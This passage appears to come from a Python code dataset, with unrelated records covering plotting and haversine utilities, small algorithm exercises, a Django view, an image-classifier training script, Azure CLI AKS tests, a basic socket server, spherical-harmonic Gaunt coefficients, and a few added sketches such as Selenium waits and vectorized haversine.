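The registration test above repeats the find/send_keys pair and relies on fixed `time.sleep` calls. A hedged sketch of the same step using Selenium's explicit waits follows; it is not part of the dataset, it assumes a working Chrome driver, and `fill_field` is a made-up helper name. The URL and selector are the ones the test itself uses.

```python
# Sketch: replace fixed sleeps with an explicit wait before typing.
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

def fill_field(browser, css_selector, text, timeout=10):
    # Wait until the input is actually present instead of sleeping blindly.
    field = WebDriverWait(browser, timeout).until(
        EC.presence_of_element_located((By.CSS_SELECTOR, css_selector)))
    field.send_keys(text)

browser = webdriver.Chrome()
try:
    browser.get("http://suninjuly.github.io/registration2.html")
    fill_field(browser, "input:required.form-control.first", "mikhail")
finally:
    browser.quit()
```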
{"seq_id":"358192783","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 27 14:30:26 2017\n\n@author: ansty\n\"\"\"\n\n\nimport math\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimport pylab as P\n\n\nimport warnings\nwarnings.filterwarnings('ignore')\nimport mpl_toolkits\nmpl_toolkits.__path__.append('/usr/lib/python2.7/dist-packages/mpl_toolkits/')\nfrom mpl_toolkits.basemap import Basemap\n\n\nimport folium\n\ndef generate_folium(df):\n    \n    my_map = folium.Map(location=[55.88207495748612, 10.636574309440173], zoom_start=6)\n    for coords in zip(df.lon.values, \n                      df.lat.values):\n        folium.CircleMarker(location=[coords[1], coords[0]], radius=2).add_to(my_map)\n    my_map.save('data/sales_locations_1992.html')\n    \n    \ndef generate_basemap(df):\n    \n    fig = plt.figure(figsize=(8, 8))\n    m = Basemap(projection='lcc', resolution=None,\n                width=5000000, height=5000000, \n                lat_0=55, lon_0=10,)\n    \n    for index,coord in df.iterrows():\n        #print(coord['lat'])\n        x, y = m(coord['lon'],coord['lat'])\n        plt.plot(x, y, 'ok', markersize=5)\n    plt.savefig('./data/50km_range_norreport.png')\n\ndef generate_2d_plot(df):\n    fig = df.plot(x='distance', y='price_per_sq_m')\n    plt.savefig('./data/price_per_sq_m_plot.png')\n    plt.show()\n\ndef generate_histogram(df,column):\n    fig = plt.figure()\n    ax = fig.add_subplot(111)\n    list_plot = df[column].tolist()\n    numBins = 150\n    ax.hist(list_plot,numBins,color='green',alpha=0.9)\n    plt.show()\n    plt.savefig('./data/histogram')\n    \ndef generate_histogram_cumulatve(df,column,frequency):\n    \n    list_all = df[[column, frequency]]\n    test = list_all.values.tolist()\n    print(test)\n    numBins = 150\n    #P.figure()\n    #P.hist(list_all.tolist(), numBins, histtype='step', stacked=True, fill=True)\n    #P.show()\n    \ndef generate_histogram_cumulatve_dataframe(df,column,frequency):\n    \n    df_2 = df[[column, frequency]]\n    df_3 = df_2.groupby([column,frequency]).size().reset_index(name='counts')\n    df_3.pivot_table(index='zip_code', columns='no_rooms', values='counts', aggfunc='sum').plot(rot=0, stacked=True)\n    plt.savefig('./data/histogram_cumulatve')\n    \ndef generate_histogram_3d(df,column,frequency):\n    \n    df_2 = df[[column, frequency]]\n    df_3 = df_2.groupby([column,frequency]).size().reset_index(name='counts')\n    #df_3.pivot_table(index='zip_code', columns='no_rooms', values='counts', aggfunc='sum').plot(rot=0, stacked=True)\n    #plt.savefig('./data/histogram_cumulatve')\n    \ndef generate_scatter_plot_from_dataframe(df):\n    cols = ['lon', 'lat']\n    df[cols].plot(kind='scatter', \n                  x='lon',\n                  y='lat')\n    \ndef generate_scatter_plot_from_dataframe_distances(df):\n    lat = df['lat'].tolist()\n    lon = df['lon'].tolist()\n    distances = df['distance'] \n    return plt.scatter(lon,lat,c=distances)\n    \n\ndef save_plot(plot,filename):\n    plot.get_figure().savefig(filename)\n\ndef generate_scatter_plot_distances(lat,long,distances,filename):\n    return plt.scatter(long,lat,c=distances)\n    \ndef get_haversine_distances_from_pos(df,pos,maxkm):\n    lat = df['lat'].tolist()\n    lon = df['lon'].tolist()\n    latlon_list = zip(lat,lon)\n    pos_within_maxkm = []\n    for row in latlon_list:\n        distance = haversine_distance(pos, row)\n        if maxkm is not None:\n            if distance < maxkm: \n                pos_within_maxkm.append((row, distance))\n        else:\n            pos_within_maxkm.append((row, distance))\n    return pos_within_maxkm\n\ndef get_datafraeme_with_haversine_distances_from_pos(df,pos,maxkm):\n    lat = df['lat'].tolist()\n    lon = df['lon'].tolist()\n    latlon_list = zip(lat,lon)\n    haversine_distances = []\n    lat_list = []\n    lon_list = []\n    for row in latlon_list:\n        distance = haversine_distance(pos, row)\n        if maxkm is not None:\n            if distance < maxkm:\n                lat_list.append(row[0])\n                lon_list.append(row[1])\n                haversine_distances.append(distance)\n        else:\n            lat_list.append(row[0])\n            lon_list.append(row[1])\n            haversine_distances.append(distance)\n    posdf = pd.DataFrame(list(zip(lat_list, lon_list, haversine_distances)),columns=['lat','lon','distance'])\n    return posdf\n\n\ndef haversine_distance(origin, destination):\n\n    lat_orig, lon_orig = origin\n    lat_dest, lon_dest = destination\n    radius = 6371\n\n    dlat = math.radians(lat_dest-lat_orig)\n    dlon = math.radians(lon_dest-lon_orig)\n    a = (math.sin(dlat / 2) * math.sin(dlat / 2) + math.cos(math.radians(lat_orig)) \n        * math.cos(math.radians(lat_dest)) * math.sin(dlon / 2) * math.sin(dlon / 2))\n    c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n    d = radius * c\n\n    return d\n","sub_path":"assignment_4/plot_handler.py","file_name":"plot_handler.py","file_ext":"py","file_size_in_byte":4885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
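The plot_handler.py record above computes haversine distances row by row in a Python loop. A standalone sketch of the same formula vectorized with numpy follows; it is not part of the record, the sample coordinates are made up, and the column names simply mirror the code above.

```python
# Sketch: the haversine formula from plot_handler.py, vectorized with numpy
# so distances for an entire lat/lon column come out of one call.
import numpy as np
import pandas as pd

def haversine_np(lat, lon, origin, radius=6371.0):
    lat0, lon0 = np.radians(origin)
    lat, lon = np.radians(lat), np.radians(lon)
    dlat, dlon = lat - lat0, lon - lon0
    a = np.sin(dlat / 2) ** 2 + np.cos(lat0) * np.cos(lat) * np.sin(dlon / 2) ** 2
    return radius * 2 * np.arctan2(np.sqrt(a), np.sqrt(1 - a))

df = pd.DataFrame({'lat': [56.15, 55.68], 'lon': [10.21, 12.57]})  # toy data
df['distance'] = haversine_np(df['lat'].values, df['lon'].values,
                              origin=(56.1629, 10.2039))
print(df)
```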
{"seq_id":"408784378","text":"def bolha(lista: list):\n    tl = len(lista) - 1\n\n    while tl > 0:\n        for i in range(tl):\n            if len(lista[i+1]) > len(lista[i]):\n                aux = lista[i]\n                lista[i] = lista[i+1]\n                lista[i+1] = aux\n        tl -= 1\n\nn = int(input())\nwhile n > 0:\n    words = input().rsplit(' ')\n\n    bolha(words)\n\n    tl = len(words)\n    for i in range(tl-1):\n        print(words[i], end=' ')\n\n    print(words[-1])\n\n    n -= 1\n","sub_path":"uri/1244.py","file_name":"1244.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} {"seq_id":"616960237","text":"# -*- coding: UTF-8 -*-\n\"\"\"\ntitle: Single Number\nGiven a non-empty array of integers nums, every element appears twice except for one. Find that single one.\nYou must implement a solution with a linear runtime complexity and use only constant extra space.\n\n\nExample 1:\nInput: nums = [2,2,1]\nOutput: 1\n\nExample 2:\nInput: nums = [4,1,2,1,2]\nOutput: 4\n\nExample 3:\nInput: nums = [1]\nOutput: 1\n\n\nConstraints:\n1 <= nums.length <= 3 * 10^4\n-3 * 10^4 <= nums[i] <= 3 * 10^4\nEach element in the array appears twice except for one element which appears only once.\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n    def singleNumber(self, nums: List[int]) -> int:\n        \"\"\"Bit manipulation: XOR of two identical numbers is 0, and XOR of 0 with any number is that number itself\"\"\"\n        res = 0\n        for num in nums:\n            res ^= num\n        return res\n\n\nif __name__ == '__main__':\n    print(Solution().singleNumber([4, 1, 2, 1, 2]))\n","sub_path":"All_Solutions/a136_single-number.py","file_name":"a136_single-number.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} {"seq_id":"273696521","text":"#Lab 2\n#Nabeel Khan\n#Nabeel.khan24@myhunter.cuny.edu\n#February 7, 2020\n#This program draws a decagon\n\nimport turtle\n\nmeep = turtle.Turtle()\nfor i in range(10):\n    meep.forward(100)\n    meep.left(36)","sub_path":"Lab 2.py","file_name":"Lab 2.py","file_ext":"py","file_size_in_byte":199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} {"seq_id":"217929563","text":"from django.shortcuts import render\nfrom django.views.generic.detail import DetailView\nfrom django.http import HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\nfrom gallery.models import Gallery,Photo\n\n\nclass GalleryDetailView(DetailView):\n    model = Gallery\n    template_name = \"gallery_detail.html\"\n\n    def get(self, request, **kwargs):\n        self.object = self.get_object()\n        uid = self.object.uid\n        language = request.LANGUAGE_CODE\n        new_obj = Gallery.objects.get(uid=uid,language_code=language)\n        slug = self.kwargs.get(\"slug\")\n        if slug != new_obj.slug:\n            return HttpResponseRedirect(reverse(\"gallery:gallery_detail\",args=(new_obj.slug,)))\n        else:\n            context = self.get_context_data(object=self.object)\n            return self.render_to_response(context)\n","sub_path":"ituro_website/gallery/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
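The single-number record above (a136_single-number.py) relies on the XOR identities a ^ a == 0 and 0 ^ a == a, so folding XOR over the whole array leaves exactly the unpaired value. A quick standalone check of that identity, not part of the dataset:

```python
# Sketch: the XOR fold behind the single-number solution above.
from functools import reduce
from operator import xor

nums = [4, 1, 2, 1, 2]
# Pairs cancel out, so the fold reduces to the element that appears once.
assert reduce(xor, nums) == 4
print(reduce(xor, nums))
```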
{"seq_id":"505541958","text":"import os\n\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\"\n\nfrom train import data_downloader\n\n\nclass ModelType:\n    Xception = \"Xception\"\n    MobileNetV2 = \"MobileNetV2\"\n    VGG16 = \"VGG16\"\n    NASNetMobile = \"NASNetMobile\"\n    InceptionResNetV2 = \"InceptionResNetV2\"\n\n    img_size_map = {\n        Xception: 299,\n        MobileNetV2: 224,\n        VGG16: 224,\n        NASNetMobile: 224,\n        InceptionResNetV2: 299,\n    }\n\n    def __init__(self, model_str):\n        self.model_str = model_str\n\n    @property\n    def img_size(self):\n        return self.img_size_map[self.model_str]\n\n\ndef main(need_download=False):\n    from model import keras_model\n    from model import custom_model\n    from model import model_info\n    from plot import show_single_image\n    from train import data_loader\n\n    import matplotlib.pyplot as plt\n\n    plt.interactive(False)\n\n    # gpus = tf.config.experimental.list_physical_devices('GPU')\n    # if gpus:\n    #     try:\n    #         tf.config.experimental.set_memory_growth(gpus[0], True)\n    #     except RuntimeError as e:\n    #         # memory growth must be enabled at program startup\n    #         print(e)\n\n    data_type = data_loader.DataType(data_loader.DataType.People)\n\n    # start the download\n    if need_download:\n        session = data_downloader.get_session()\n        # split train/validate folders under the data folder and download into folders named after each label\n        data_type.download(session)\n\n    # load data\n    model_type = ModelType(ModelType.NASNetMobile)\n    train_model = True\n    base_model_only = False\n\n    data_info = data_loader.DatasetInfo(\n        img_size=model_type.img_size, data_type=data_type\n    )\n    dataset = data_loader.Dataset(data_info)\n\n    model_info = model_info.ModelInfo(\n        model_type.model_str,\n        base_model_only=base_model_only,\n        model_name=data_type.data_str,\n        class_names=dataset.class_names,\n        version=model_type.model_str + \"_1.0\",\n        data_info=data_info,\n        img_size=model_type.img_size,\n        load_model=True,\n        load_model_path=\"models/People/NASNetMobile_1.0/2020_02_22_12_32_07/model.022-1.02.hdf5\",\n    )\n\n    # model_info = model_info.ModelInfo(model_type.model_str, base_model_only=base_model_only,\n    #                                   model_name=data_type.data_str, class_names=dataset.class_names,\n    #                                   version=model_type.model_str + \"_1.0\", data_info=data_info,\n    #                                   img_size=model_type.img_size)\n\n    model = custom_model.CNNWithDense(model_info)\n    data_loader.confusing_data(model, data_info)\n\n    if train_model:\n        # CHECK which file is not trained\n        untrained_dataset = data_loader.Dataset(data_info, from_untrained_file=True)\n\n        last_layer_train_info = keras_model.TrainInfo(\n            learning_rate=1e-5,\n            momentum=0.9,\n            update_base=False,\n            warmup_batches=15,\n            epochs=30,\n        )\n        model.train_model(untrained_dataset, last_layer_train_info)\n        model.train_model(dataset, last_layer_train_info)\n\n        all_layer_train_info = keras_model.TrainInfo(\n            learning_rate=1e-6,\n            momentum=0.9,\n            update_base=True,\n            warmup_batches=15,\n            epochs=30,\n        )\n        model.train_model(dataset, all_layer_train_info)\n\n    # sample train and test with it\n    train, val = dataset.get_raw_data()\n    for image in train:\n        prob_list, label, version, class_names = model.predict(image[0])\n        show_single_image(image, label)\n\n        print(label)\n        input(\"Next\")\n\n\nif __name__ == \"__main__\":\n    main(need_download=True)\n","sub_path":"src/train_main.py","file_name":"train_main.py","file_ext":"py","file_size_in_byte":3703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
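Several training records in this corpus stop training once a metric crosses a threshold via a custom Keras callback (see also the CustomCallback further below that stops at accuracy > 0.90). A standalone sketch of that pattern on a tiny toy model, so it runs without any of the records' local modules or image data; the class name and threshold here are illustrative, not from the dataset:

```python
# Sketch: an accuracy-threshold stopping callback, demonstrated end to end
# on a trivially learnable synthetic problem.
import numpy as np
import tensorflow as tf

class StopAtAccuracy(tf.keras.callbacks.Callback):
    def __init__(self, threshold=0.90):
        super().__init__()
        self.threshold = threshold

    def on_epoch_end(self, epoch, logs=None):
        # logs carries the metrics named in model.compile(metrics=...)
        if logs and logs.get('accuracy', 0) > self.threshold:
            self.model.stop_training = True

x = np.random.rand(64, 4)
y = (x.sum(axis=1) > 2).astype(int)  # simple rule the model can learn fast
model = tf.keras.Sequential([tf.keras.layers.Dense(8, activation='relu'),
                             tf.keras.layers.Dense(1, activation='sigmoid')])
model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])
model.fit(x, y, epochs=50, verbose=0, callbacks=[StopAtAccuracy()])
```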
{"seq_id":"592251635","text":"import requests\nimport json\n\nclass Light:\n\tlight_id = '0'\n\ton = False\n\tbrightness = 0\n\thue = 0\n\tsaturation = 0\n\n\tdef __init__(self, light_id, state = None):\n\t\tself.light_id = light_id\n\t\tself.update(state)\n\n\tdef update(self, state = None):\n\t\tif(state == None): #Then we refresh\n\t\t\tstate = get_state(self.light_id)\n\t\telse:\n\t\t\tif 'on' in state.keys():\n\t\t\t\tself.on = state['on']\n\t\t\tif 'bri' in state.keys():\n\t\t\t\tself.brightness = state['bri']\n\t\t\tif 'hue' in state.keys():\n\t\t\t\tself.hue = state['hue']\n\t\t\tif 'sat' in state.keys():\n\t\t\t\tself.saturation = state['sat']\n\n\tdef to_dict(self):\n\t\treturn {'Light': self.light_id, 'is on': self.on, 'bri': self.brightness, 'hue': self.hue, 'sat': self.saturation }\n","sub_path":"Light.py","file_name":"Light.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} {"seq_id":"229639249","text":"'''\nCreated on Dec 8, 2014\nmp3 : http://mp3cut.net/\n@author: wangjoh\n'''\n\n'''\nCreated on Dec 7, 2014\n\n@author: wangjoh\n'''\nimport hashlib\n\nprint ('process 1st metadata')\nf1 = input('Enter first file : ')\n#f1 = sys.argv[2]\nt1tbl={}\ni1tbl={}\n\nchunks=0\nngramIndex=0\ntmp=''\ncount=0\n\nwith open(f1,'rb') as f:\n    while True:\n        line=f.readline()\n        if not line: break\n        arr=line.strip().split()\n        if arr[0] == b'file':\n            t1tbl.clear()\n        elif arr[0] == b'chunk':\n            chunks=chunks+1\n            t1tbl[chunks]=arr[3]\n            #length=length+int(arr[2])\n            #tresult = ttbl.has_key(arr[3])\n            #if tresult == False:\n\nfor i1 in t1tbl:\n    print (i1,'-',t1tbl[i1])\n    \nfor x1 in t1tbl:\n    if (x1+3) <= chunks:\n        tmp = t1tbl[x1].decode(\"utf-8\")+t1tbl[x1+1].decode(\"utf-8\")+t1tbl[x1+2].decode(\"utf-8\")+t1tbl[x1+3].decode(\"utf-8\")\n        ngramIndex=ngramIndex+1 \n        i1tbl[hashlib.sha1(tmp.encode(encoding='utf_8', errors='strict')).hexdigest()]=tmp\n\nfor y1 in sorted(i1tbl):\n    count=count+1\n    print (count, y1,'-',i1tbl[y1])\n\nprint ('process 2nd metadata')\nf2 = input('Enter second file : ')\n#f2 = sys.argv[4]\nt2tbl={}\ni2tbl={}\n\nchunks=0\nngramIndex=0\ntmp=''\ncount=0\n\nwith open(f2,'rb') as f:\n    while True:\n        line=f.readline()\n        if not line: break\n        arr=line.strip().split()\n        if arr[0] == b'file':\n            t2tbl.clear()\n        elif arr[0] == b'chunk':\n            chunks=chunks+1\n            t2tbl[chunks]=arr[3]\n            #length=length+int(arr[2])\n            #tresult = ttbl.has_key(arr[3])\n            #if tresult == False:\n\nfor i2 in t2tbl:\n    print (i2,'-',t2tbl[i2])\n    \nfor x2 in t2tbl:\n    if (x2+3) <= chunks:\n        tmp = t2tbl[x2].decode(\"utf-8\")+t2tbl[x2+1].decode(\"utf-8\")+t2tbl[x2+2].decode(\"utf-8\")+t2tbl[x2+3].decode(\"utf-8\")\n        ngramIndex=ngramIndex+1 \n        i2tbl[hashlib.sha1(tmp.encode(encoding='utf_8', errors='strict')).hexdigest()]=tmp\n        #itbl[ngramIndex]=tmp\n\nfor y2 in sorted(i2tbl):\n    count=count+1\n    print (count, y2,'-',i2tbl[y2])\n\n#calculate Jaccard similarity rate\nuniontbl={}\nprint ('print union')\nunioncount=0\nuniontbl = dict(list(i1tbl.items()) + list(i2tbl.items()))\nfor j in uniontbl:\n    print (j,'-',uniontbl[j])\n    unioncount=unioncount+1\n\nintersecttbl={}\nprint ('print intersection')\nintersectcount=0\nintersecttbl = dict(i1tbl.items() & i2tbl.items())\nfor k in intersecttbl:\n    print (k,'-',intersecttbl[k])\n    intersectcount=intersectcount+1\n    \nprint (round(intersectcount/unioncount,4)*100, '%') \n","sub_path":"prjPyMinHash/pkgPyMinHash/testcliMin-Wise.py","file_name":"testcliMin-Wise.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} {"seq_id":"207986280","text":"import logging\nlogging.basicConfig(filename=\"mylog.txt\",level=logging.INFO)\nlogging.info(\"A New request came:\")\ntry:\n    x=int(input(\"Enter the first number: \"))\n    y=int(input(\"Enter the second number: \"))\n    print(x/y)\nexcept ZeroDivisionError as msg:\n    print(\"Cannot divide by zero\")\n    logging.exception(msg)\nexcept ValueError as msg:\n    print(\"Enter only int values\")\n    logging.exception(msg)\nlogging.info(\"request processing completed\")","sub_path":"New Test.py","file_name":"New Test.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} {"seq_id":"404893690","text":"# 
--------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n\nimport tempfile\nimport unittest\n\nfrom azure.cli.testsdk import (ScenarioTest, ResourceGroupPreparer, JMESPathCheck,\n JMESPathCheckExists)\n\n# flake8: noqa\n\nclass AzureKubernetesServiceScenarioTest(ScenarioTest):\n @ResourceGroupPreparer(random_name_length=17, name_prefix='clitest')\n def test_aks_create_default_service(self, resource_group, resource_group_location):\n # the simplest aks create scenario\n loc = resource_group_location\n # override loc to westus2\n loc = 'westus2'\n ssh_pubkey_file = self.generate_ssh_keys()\n aks_name = self.create_random_name('cliakstest', 16)\n dns_prefix = self.create_random_name('cliaksdns', 16)\n\n # create\n ssh_pubkey_file = ssh_pubkey_file.replace('\\\\', '\\\\\\\\')\n create_cmd = 'aks create -g {} -n {} --dns-name-prefix {} --ssh-key-value {} -l {}'\n self.cmd(create_cmd.format(resource_group, aks_name, dns_prefix, ssh_pubkey_file, loc), checks=[\n JMESPathCheckExists('properties.fqdn'),\n JMESPathCheck('properties.provisioningState', 'Succeeded')\n ])\n\n # show\n self.cmd('aks show -g {} -n {}'.format(resource_group, aks_name), checks=[\n JMESPathCheck('type', 'Microsoft.ContainerService/ManagedClusters'),\n JMESPathCheck('name', aks_name),\n JMESPathCheck('resourceGroup', resource_group),\n JMESPathCheck('properties.agentPoolProfiles[0].count', 3),\n JMESPathCheck('properties.agentPoolProfiles[0].vmSize', 'Standard_D2_v2'),\n JMESPathCheck('properties.dnsPrefix', dns_prefix)\n ])\n\n # scale-up\n self.cmd('aks scale -g {} -n {} --node-count 5'.format(resource_group, aks_name), checks=[\n JMESPathCheck('properties.agentPoolProfiles[0].count', 5)\n ])\n\n # show again\n self.cmd('aks show -g {} -n {}'.format(resource_group, aks_name), checks=[\n JMESPathCheck('properties.agentPoolProfiles[0].count', 5)\n ])\n\n @ResourceGroupPreparer(random_name_length=17, name_prefix='clitest')\n def test_aks_create_with_upgrade(self, resource_group, resource_group_location):\n loc = resource_group_location\n # override loc to westus2\n loc = 'westus2'\n ssh_pubkey_file = self.generate_ssh_keys()\n aks_name = self.create_random_name('cliakstest', 16)\n dns_prefix = self.create_random_name('cliaksdns', 16)\n original_k8s_version = '1.7.7'\n\n # create\n ssh_pubkey_file = ssh_pubkey_file.replace('\\\\', '\\\\\\\\')\n create_cmd = 'aks create -g {} -n {} --dns-name-prefix {} --ssh-key-value {} --kubernetes-version {} -l {}'\n self.cmd(create_cmd.format(resource_group, aks_name, dns_prefix, ssh_pubkey_file, original_k8s_version, loc),\n checks=[\n JMESPathCheckExists('properties.fqdn'),\n JMESPathCheck('properties.provisioningState', 'Succeeded')])\n\n # show\n self.cmd('aks show -g {} -n {}'.format(resource_group, aks_name), checks=[\n JMESPathCheck('type', 'Microsoft.ContainerService/ManagedClusters'),\n JMESPathCheck('name', aks_name),\n JMESPathCheck('resourceGroup', resource_group),\n JMESPathCheck('properties.agentPoolProfiles[0].count', 3),\n JMESPathCheck('properties.agentPoolProfiles[0].vmSize', 'Standard_D2_v2'),\n JMESPathCheck('properties.dnsPrefix', dns_prefix),\n JMESPathCheck('properties.provisioningState', 'Succeeded'),\n JMESPathCheck('properties.kubernetesVersion', '1.7.7')\n ])\n\n # upgrade\n 
new_k8s_version = '1.8.1'\n upgrade_cmd = 'aks upgrade -g {} -n {} --kubernetes-version {} --yes'\n self.cmd(upgrade_cmd.format(resource_group, aks_name, new_k8s_version), checks=[\n JMESPathCheck('properties.provisioningState', 'Succeeded')\n ])\n\n # show again\n self.cmd('aks show -g {} -n {}'.format(resource_group, aks_name), checks=[\n JMESPathCheck('properties.kubernetesVersion', '1.8.1')\n ])\n\n @classmethod\n def generate_ssh_keys(cls):\n TEST_SSH_KEY_PUB = \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCbIg1guRHbI0lV11wWDt1r2cUdcNd27CJsg+SfgC7miZeubtwUhbsPdhMQsfDyhOWHq1+ZL0M+nJZV63d/1dhmhtgyOqejUwrPlzKhydsbrsdUor+JmNJDdW01v7BXHyuymT8G4s09jCasNOwiufbP/qp72ruu0bIA1nySsvlf9pCQAuFkAnVnf/rFhUlOkhtRpwcq8SUNY2zRHR/EKb/4NWY1JzR4sa3q2fWIJdrrX0DvLoa5g9bIEd4Df79ba7v+yiUBOS0zT2ll+z4g9izHK3EO5d8hL4jYxcjKs+wcslSYRWrascfscLgMlMGh0CdKeNTDjHpGPncaf3Z+FwwwjWeuiNBxv7bJo13/8B/098KlVDl4GZqsoBCEjPyJfV6hO0y/LkRGkk7oHWKgeWAfKtfLItRp00eZ4fcJNK9kCaSMmEugoZWcI7NGbZXzqFWqbpRI7NcDP9+WIQ+i9U5vqWsqd/zng4kbuAJ6UuKqIzB0upYrLShfQE3SAck8oaLhJqqq56VfDuASNpJKidV+zq27HfSBmbXnkR/5AK337dc3MXKJypoK/QPMLKUAP5XLPbs+NddJQV7EZXd29DLgp+fRIg3edpKdO7ZErWhv7d+3Kws+e1Y+ypmR2WIVSwVyBEUfgv2C8Ts9gnTF4pNcEY/S2aBicz5Ew2+jdyGNQQ== test@example.com\\n\" # pylint: disable=line-too-long\n _, pathname = tempfile.mkstemp()\n with open(pathname, 'w') as key_file:\n key_file.write(TEST_SSH_KEY_PUB)\n return pathname\n","sub_path":"src/command_modules/azure-cli-acs/azure/cli/command_modules/acs/tests/test_aks_commands.py","file_name":"test_aks_commands.py","file_ext":"py","file_size_in_byte":5482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"430337484","text":"import socket\n\n\nadd = ('127.0.0.1',8000)\nsock = socket.socket()\nsock.bind(add)\nsock.listen()\n\ntry:\n conn, radd = sock.accept()\n data = conn.recv(1024)\n print(data)\n ret_http ='HTTP/1.1 200 OK\\n Content-Type:text/html\\n Content-length:'\n with open(r'D:\\magedu_python\\img.jpg','rb') as f:\n info = f.read()\n length = len(info)\n ret_http = ret_http.encode()+ str(length).encode() + b'\\n\\n'+ info\n send = conn.sendall(ret_http)\n conn.send(info)\n conn.close()\n sock.close()\nexcept Exception as e:print(e)\nfinally:\n sock.close()","sub_path":"blog_be/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"225661802","text":"# Tools for multiplying real spherical harmonics\n\n# Based on:\n# Herbert H.H. Homeier, E.Otto Steinborn,\n# Some properties of the coupling coefficients of real spherical harmonics\n# and their relation to Gaunt coefficients,\n# Journal of Molecular Structure\n# Volume 368, 1996, Pages 31-37, ISSN 0166-1280,\n# https://doi.org/10.1016/S0166-1280(96)90531-X.\n\nfrom polaris import util as myutil\nimport numpy as np\nfrom sympy import *\nfrom sympy.physics.wigner import gaunt, wigner_3j, clebsch_gordan\nkd = KroneckerDelta\n\n# Heaviside function\ndef hv(x):\n if x > 0:\n return 1\n else:\n return 0\n\n# Unitary matrix that transforms complex sh to real sh\n# See Eq. 12.\ndef U(l, m, mu):\n t1 = kd(m, 0)*kd(mu, 0)\n t2 = hv(mu)*kd(m, mu)\n t3 = hv(-mu)*I*((-1)**np.abs(m))*kd(m, mu)\n t4 = hv(-mu)*(-I)*kd(m, -mu)\n t5 = hv(mu)*((-1)**np.abs(m))*kd(m, -mu)\n return t1 + ((t2 + t3 + t4 + t5)/sqrt(2))\n\n# Real gaunt coefficients\n# See Eqs. 26. 
The sympy gaunt function does not use a complex conjugate.\n# This sum could be truncated using selection rules, but this is fairly quick.\ndef Rgaunt(l1, l2, l3, m1, m2, m3, evaluate=True):\n result = 0\n for m1p in range(-l1, l1+1):\n U1 = U(l1, m1p, m1)\n for m2p in range(-l2, l2+1):\n U2 = U(l2, m2p, m2)\n for m3p in range(-l3, l3+1):\n U3 = U(l3, m3p, m3)\n result += U1*U2*U3*gaunt(l1, l2, l3, m1p, m2p, m3p)\n if evaluate:\n return result.evalf()\n else:\n return result\n\n# Compute and save an array with all of the gaunt coefficients up to specified\n# band\ndef calc_gaunt_tensor(filename, lmax=4):\n jmax = myutil.maxl2maxj(lmax)\n G = np.zeros((jmax, jmax, jmax))\n for index, g in np.ndenumerate(G):\n print(index)\n l1, m1 = myutil.j2lm(index[0])\n l2, m2 = myutil.j2lm(index[1])\n l3, m3 = myutil.j2lm(index[2])\n G[index] = Rgaunt(l1, l2, l3, m1, m2, m3)\n np.save(filename, G)\n return G\n\n# Compute and save an array with all of the circular harmonic triple integrals\n# up to specified band\ndef calc_chtriple_tensor(filename, nmax=2):\n def ch(n):\n if n == 0:\n return 1/sqrt(2*pi)\n if n > 0:\n return cos(n*x)/sqrt(pi)\n if n < 0:\n return sin(n*x)/sqrt(pi)\n \n nlen = 2*nmax + 1\n P = np.zeros((nlen, nlen, nlen))\n x = Symbol('x')\n for index, p in np.ndenumerate(P):\n n1 = myutil.i2n(index[0])\n n2 = myutil.i2n(index[1])\n n3 = myutil.i2n(index[2])\n P[index] = integrate(ch(n1)*ch(n2)*ch(n3), (x, 0, 2*pi))\n print(index, P[index])\n print(P)\n np.save(filename, P)\n return 1\n\n# Multiply two vectors of even band real spherical harmonic coefficients.\n# Vectors must have the same length and be ordered like\n#\n# y_0^0, y_2^-2, y_2^-1, y_2^0, y_2^1...\n#\n# Example:\n#\n# multiply_sh_coefficients([2, 1, 0, 0, 0, 0], [0, 1, 0, 0, 0, 0])\n#\n# gives the coefficients of (2y_0^0 + y_2^-2) x y_2^-2.\n#\n# Slow compared to precomputing the \"gaunt tensor\"---see shcoeffs.py\ndef multiply_sh_coefficients(a, b, evaluate=True):\n maxl, m = myutil.j2lm(len(a) - 1)\n c = [0]*(myutil.maxl2maxj(maxl + 2))\n for i, ai in enumerate(a):\n l1, m1 = myutil.j2lm(i)\n for j, bi in enumerate(b):\n l2, m2 = myutil.j2lm(j)\n for k, ci in enumerate(c):\n l3, m3 = myutil.j2lm(k)\n if ai != 0 and bi != 0:\n c[k] += ai*bi*Rgaunt(l1, l2, l3, m1, m2, m3, evaluate=evaluate)\n return c\n","sub_path":"polaris/harmonics/gaunt.py","file_name":"gaunt.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"633480441","text":"import os\nimport re\nimport logging\nfrom flask import Flask\n\n\n\nclass Boot:\n 